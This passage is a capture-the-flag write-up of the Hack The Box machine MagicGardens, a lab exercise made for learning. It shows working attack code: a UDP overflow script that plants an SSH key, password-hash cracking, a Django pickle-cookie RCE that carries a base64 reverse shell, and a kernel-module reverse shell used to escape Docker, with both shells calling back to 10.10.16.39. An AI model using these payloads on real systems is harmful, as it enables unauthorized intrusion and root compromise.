with open('bof.txt','rb') as f:
data=bytearray(f.read())
new=b"/tmp/kujen.txt\r"
#data[65372:len(new)]=new
s.send(data[:65372]+new)

And we can see the beginning of what was written into the file:

1
2
3
┌──(kali㉿kali)-[~]
└─$ cat /tmp/kujen.txt$'\r'
Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al<snip>

Checking the offset now:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ msf-pattern_offset -q Aa4A -l 65500
[*] Exact match at offset 12
[*] Exact match at offset 20292
[*] Exact match at offset 40572
[*] Exact match at offset 60852

I’ll go with the “12” offset.
One last step is I’ll inject a random known string to check with this offset:

1
2
3
4
5
6
7
8
9
10
11
12
13
import socket
server_address = ('::1',6666)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)

data = ''
with open('bof.txt', 'rb') as f:
data = bytearray(f.read())
new = b"/tmp/kujen.txt"
sendData = data[:65372] + new
code = "kujenRocks"
sendData[12:12+len(code)]=code.encode()
s.send(sendData)

And we got it:

1
2
3
┌──(kali㉿kali)-[~]
└─$ cat /tmp/kujen.txt
kujenRocksa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6A

Now let’s inject our ssh public key inside of Alex’s ssh directory:

1
2
3
4
5
6
7
8
9
10
11
import socket
server_address = ('::1',6666)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)

data = bytearray(b'\n'*65403)
new = b"/home/alex/.ssh/authorized_keys"
sendData = data[:65372] + new
code = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8HIyGJoNXYUf9/e1b7ZkdtI7pL0Ohz4pfbX03FvStL kali@kali"
sendData[12:12+len(code)]=code.encode()
s.send(sendData)

And we’re in:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
Linux magicgardens 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sat Feb 8 05:58:50 2025 from 10.10.16.39
alex@magicgardens:~$ id
uid=1000(alex) gid=1000(alex) groups=1000(alex),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth)
alex@magicgardens:~$ cat user.txt
915a2510beb449efc4a0945814ba5e73
alex@magicgardens:~$

Privilege Escalation - Docker Escape

One of the first things to check is existing emails:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
alex@magicgardens:/var/mail$ cat alex 
From [email protected] Fri Sep 29 09:31:49 2023
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by magicgardens.magicgardens.htb (Postfix, from userid 0)
id 3CDA93FC96; Fri, 29 Sep 2023 09:31:49 -0400 (EDT)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="1804289383-1695994309=:37178"
Subject: Auth file for docker
To: <[email protected]>
User-Agent: mail (GNU Mailutils 3.15)
Date: Fri, 29 Sep 2023 09:31:49 -0400
Message-Id: <[email protected]>
From: root <[email protected]>

--1804289383-1695994309=:37178
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-ID: <[email protected]>

Use this file for registry configuration. The password is on your desk

--1804289383-1695994309=:37178
Content-Type: application/octet-stream; name="auth.zip"
Content-Disposition: attachment; filename="auth.zip"
Content-Transfer-Encoding: base64
Content-ID: <[email protected]>

UEsDBAoACQAAAG6osFh0pjiyVAAAAEgAAAAIABwAaHRwYXNzd2RVVAkAA29KRmbOSkZmdXgLAAEE
6AMAAAToAwAAVb+x1HWvt0ZpJDnunJUUZcvJr8530ikv39GM1hxULcFJfTLLNXgEW2TdUU3uZ44S
q4L6Zcc7HmUA041ijjidMG9iSe0M/y1tf2zjMVg6Dbc1ASfJUEsHCHSmOLJUAAAASAAAAFBLAQIe
AwoACQAAAG6osFh0pjiyVAAAAEgAAAAIABgAAAAAAAEAAACkgQAAAABodHBhc3N3ZFVUBQADb0pG
ZnV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAQABAE4AAACmAAAAAAA=
--1804289383-1695994309=:37178--

alex@magicgardens:/var/mail$

Alex was sent an auth.zip file, let’s decode it and see what it has:

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~]
└─# echo 'UEsDBAoACQAAAG6osFh0pjiyVAAAAEgAAAAIABwAaHRwYXNzd2RVVAkAA29KRmbOSkZmdXgLAAEE6AMAAAToAwAAVb+x1HWvt0ZpJDnunJUUZcvJr8530ikv39GM1hxULcFJfTLLNXgEW2TdUU3uZ44Sq4L6Zcc7HmUA041ijjidMG9iSe0M/y1tf2zjMVg6Dbc1ASfJUEsHCHSmOLJUAAAASAAAAFBLAQIeAwoACQAAAG6osFh0pjiyVAAAAEgAAAAIABgAAAAAAAEAAACkgQAAAABodHBhc3N3ZFVUBQADb0pGZnV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAQABAE4AAACmAAAAAAA=' | base64 -d > auth.zip

┌──(root㉿kali)-[~]
└─# unzip auth.zip
Archive: auth.zip
[auth.zip] htpasswd password:
skipping: htpasswd incorrect password

However we need a password for it, let’s crack it then:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# john -w=/usr/share/wordlists/rockyou.txt alex.hash

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
realmadrid (auth.zip/htpasswd)
1g 0:00:00:00 DONE (2025-02-08 11:59) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

(my favourite team haha)

And this is the content of the file:

1
2
3
┌──(root㉿kali)-[~]
└─# cat htpasswd
AlexMiles:$2y$05$KKShqNw.A66mmpEqmNJ0kuoBwO2rbdWetc7eXA7TbjhHZGs2Pa5Hq

We crack that one again:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# john -w=/usr/share/wordlists/rockyou.txt htpasswd

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
diamonds (AlexMiles)
1g 0:00:00:00 DONE (2025-02-08 12:00) 4.761g/s 4628p/s 4628c/s 4628C/s blonde..87654321
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

And we got the password!
Taking a look at our network interfaces, we find some for docker. Let’s check process for anything docker-related then:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
alex@magicgardens:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:ad:b5 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.231.24/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2264sec preferred_lft 2264sec
inet6 dead:beef::250:56ff:fe94:adb5/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe94:adb5/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:92:b0:a9:3d brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:92ff:feb0:a93d/64 scope link
valid_lft forever preferred_lft forever
5: veth6339100@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether da:50:b1:69:72:7f brd ff:ff:ff:ff:ff:ff link-netnsid 2
inet6 fe80::d850:b1ff:fe69:727f/64 scope link
valid_lft forever preferred_lft forever
7: veth0c84d95@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 56:c8:f4:aa:72:c4 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::54c8:f4ff:feaa:72c4/64 scope link
valid_lft forever preferred_lft forever
9: veth528240c@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 86:3e:a6:9a:39:71 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::843e:a6ff:fe9a:3971/64 scope link
valid_lft forever preferred_lft forever
alex@magicgardens:~$ ps auxf | grep -i docker
alex 5037 0.0 0.0 6332 2132 pts/0 S+ 06:10 0:00 \_ grep -i docker
root 1025 0.0 2.1 1827668 85144 ? Ssl 02:44 0:02 /usr/sbin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1493 0.0 0.3 1082488 14852 ? Sl 02:44 0:00 \_ /usr/sbin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 5000 -container-ip 172.17.0.2 -container-port 5000
root 1499 0.0 0.3 1156220 12988 ? Sl 02:44 0:00 \_ /usr/sbin/docker-proxy -proto tcp -host-ip :: -host-port 5000 -container-ip 172.17.0.2 -container-port 5000
root 1512 0.0 0.3 1082488 12948 ? Sl 02:44 0:00 \_ /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.3 -container-port 80
root 1526 0.0 0.4 1303940 17008 ? Sl 02:44 0:01 \_ /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8000 -container-ip 172.17.0.4 -container-port 80
root 1617 0.0 0.5 728256 22984 ? Ssl 02:44 0:01 \_ registry serve /etc/docker/registry/config.yml
alex@magicgardens:~$

We can use this https://github.com/Syzik/DockerRegistryGrabber to dump the docker images using these creds AlexMiles:diamonds :

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/DockerRegistryGrabber]
└─$ python3 drg.py https://magicgardens.htb -U AlexMiles -P diamonds --dump magicgardens.htb
[+] BlobSum found 32
[+] Dumping magicgardens.htb
[+] Downloading : d3a3443a740ae9a727dbd8868b751b492da27507f3cbbe0965982e65c436b8c0
[+] Downloading : 2ed799371a1863449219ad8510767e894da4c1364f94701e7a26cc983aaf4ca6

Now I’ll lookg for something interesting. And after some time, I found some Django secret key while I was looking for stuff related to Morty:

1
2
3
4
5
6
└─$ zgrep -la morty *.tar.gz
2ed799371a1863449219ad8510767e894da4c1364f94701e7a26cc983aaf4ca6.tar.gz
480311b89e2d843d87e76ea44ffbb212643ba89c1e147f0d0ff800b5fe8964fb.tar.gz
b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c.tar.gz
d3a3443a740ae9a727dbd8868b751b492da27507f3cbbe0965982e65c436b8c0.tar.gz
d66316738a2760996cb59c8eb2b28c8fa10a73ce1d98fb75fda66071a1c659d6.tar.gz

And we get our SECRET_KEY: SECRET_KEY=55A6cc8e2b8#ae1662c34)618U549601$7eC3f0@b1e8c2577J22a8f6edcb5c9b80X8f4&87b

A point later pointed me to this article: https://www.cnblogs.com/-zhong/p/13463486.html talking about an RCE in Django.

We’ll simply put the SECRET_KEY inside of the code, get a session cookie that we’ll later inject inside of a request going to the Django instance, and get our root shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from django.contrib.sessions.serializers import PickleSerializer

from django.core import signing

from django.conf import settings

settings.configure(SECRET_KEY="55A6cc8e2b8#ae1662c34)618U549601$7eC3f0@b1e8c2577J22a8f6edcb5c9b80X8f4&87b")


class CreateTmpFile(object):

def __reduce__(self):

import subprocess

return (subprocess.call,

(['bash',

'-c','echo L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMzkvNDQ0NCAwPiYxJw== | base64 -d | bash'],))



sess = signing.dumps(

obj=CreateTmpFile(),

serializer=PickleSerializer,

salt='django.contrib.sessions.backends.signed_cookies'

)

print(sess)


1
2
3
4
┌──(kali㉿kali)-[~]
└─$ python3 exploit.py
gAWVmgAAAAAAAACMCnN1YnByb2Nlc3OUjARjYWxslJOUXZQojARiYXNolIwCLWOUjGxlY2hvIEwySnBiaTlpWVhOb0lDMWpJQ2N2WW1sdUwySmhjMmdnTFdrZ1BpWWdMMlJsZGk5MFkzQXZNVEF1TVRBdU1UWXVNemt2TkRRME5DQXdQaVl4Snc9PSB8IGJhc2U2NCAtZCB8IGJhc2iUZYWUUpQu:1tgj0G:8N1ldc_ZX9dgBHeT-zRhsMT-jNEo3571F7eL7QE6Zwo

Now we gonna inject this session cookie:

1
2
3
4
5
6
7
8
9
10
11
12
GET /admin/ HTTP/1.1
Host: magicgardens.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: csrftoken=KnmPhMrVtjDryqzyOEJM2Vff5azXv0hX; sessionid=gAWVmgAAAAAAAACMCnN1YnByb2Nlc3OUjARjYWxslJOUXZQojARiYXNolIwCLWOUjGxlY2hvIEwySnBiaTlpWVhOb0lDMWpJQ2N2WW1sdUwySmhjMmdnTFdrZ1BpWWdMMlJsZGk5MFkzQXZNVEF1TVRBdU1UWXVNemt2TkRRME5DQXdQaVl4Snc9PSB8IGJhc2U2NCAtZCB8IGJhc2iUZYWUUpQu:1tgj0G:8N1ldc_ZX9dgBHeT-zRhsMT-jNEo3571F7eL7QE6Zwo
Connection: keep-alive


And we’re in:

1
2
3
4
5
6
7
8
PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.39] from (UNKNOWN) [10.129.231.24] 60086
bash: cannot set terminal process group (16): Inappropriate ioctl for device
bash: no job control in this shell
root@5e5026ac6a81:/usr/src/app# id
id
uid=0(root) gid=0(root) groups=0(root)

However we are only root on the docker container.

1
2
3
4
5
6
7
8
9
root@5e5026ac6a81:/usr/src# ls
ls
app
linux-headers-6.1.0-11-amd64
linux-headers-6.1.0-11-common
linux-headers-6.1.0-20-amd64
linux-headers-6.1.0-20-common
linux-kbuild-6.1
root@5e5026ac6a81:/usr/src#

These files (linux-headers-6.1.0-11-amd64​ or linux-headers-6.1.0-11-common​) should not appear in the folder, because these files are usually used when compiling kernel. (docker will use containered, which will share the same kernel with the host).

Then gcc and make were also installed on our container, which is sus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@5e5026ac6a81:/usr/src# capsh --print

capsh --print
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1'b0 (no-new-privs=0)
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: HYBRID (4)

We can see that there is a cap_sys_module​, which means we are able to install a module for the host’s kernel and then implement privilege escalation => https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation

We’ll have to create a C reverse shell and a Makefile:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <linux/kmod.h>

#include <linux/module.h>

MODULE_LICENSE("GPL");

MODULE_AUTHOR("AttackDefense");

MODULE_DESCRIPTION("LKM reverse shell module");

MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.16.39/9001 0>&1", NULL};

static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };



// call_usermodehelper function is used to create user mode processes from kernel space

static int __init reverse_shell_init(void) {

return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
1
2
3
4
5
6
7
obj-m += reverse-shell.o

all:
$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

We’ll now simply run make inside the src folder then insert our new module:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@5e5026ac6a81:/usr/src# ls
ls
Makefile
Module.symvers
app
linux-headers-6.1.0-11-amd64
linux-headers-6.1.0-11-common
linux-headers-6.1.0-20-amd64
linux-headers-6.1.0-20-common
linux-kbuild-6.1
modules.order
reverse-shell.c
root@5e5026ac6a81:/usr/src# make
make
make -C /lib/modules/6.1.0-20-amd64/build M=/usr/src modules
make[1]: Entering directory '/usr/src/linux-headers-6.1.0-20-amd64'
CC [M] /usr/src/reverse-shell.o
MODPOST /usr/src/Module.symvers
CC [M] /usr/src/reverse-shell.mod.o
LD [M] /usr/src/reverse-shell.ko
BTF [M] /usr/src/reverse-shell.ko
Skipping BTF generation for /usr/src/reverse-shell.ko due to unavailability of vmlinux
make[1]: Leaving directory '/usr/src/linux-headers-6.1.0-20-amd64'
root@5e5026ac6a81:/usr/src# insmod reverse-shell.ko
insmod reverse-shell.ko
root@5e5026ac6a81:/usr/src#

And we’re in:

1
2
3
4
5
6
7
8
9
10
11
12
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.39] from (UNKNOWN) [10.129.231.24] 41850
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@magicgardens:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@magicgardens:/# cat /root/root.txt
cat /root/root.txt
c5c9bc85fb66baaa0bfb5072a793cd1d
root@magicgardens:/#

And that was it for MagicGardens!
-0xkujen

  • Title: Hackthebox: MagicGardens
  • Author: Foued SAIDI
  • Created at : 2025-02-07 19:44:02
  • Updated at : 2025-02-08 12:49:48
  • Link: https://kujen5.github.io/2025/02/07/Hackthebox-MagicGardens/
  • License: This work is licensed under CC BY-NC-SA 4.0.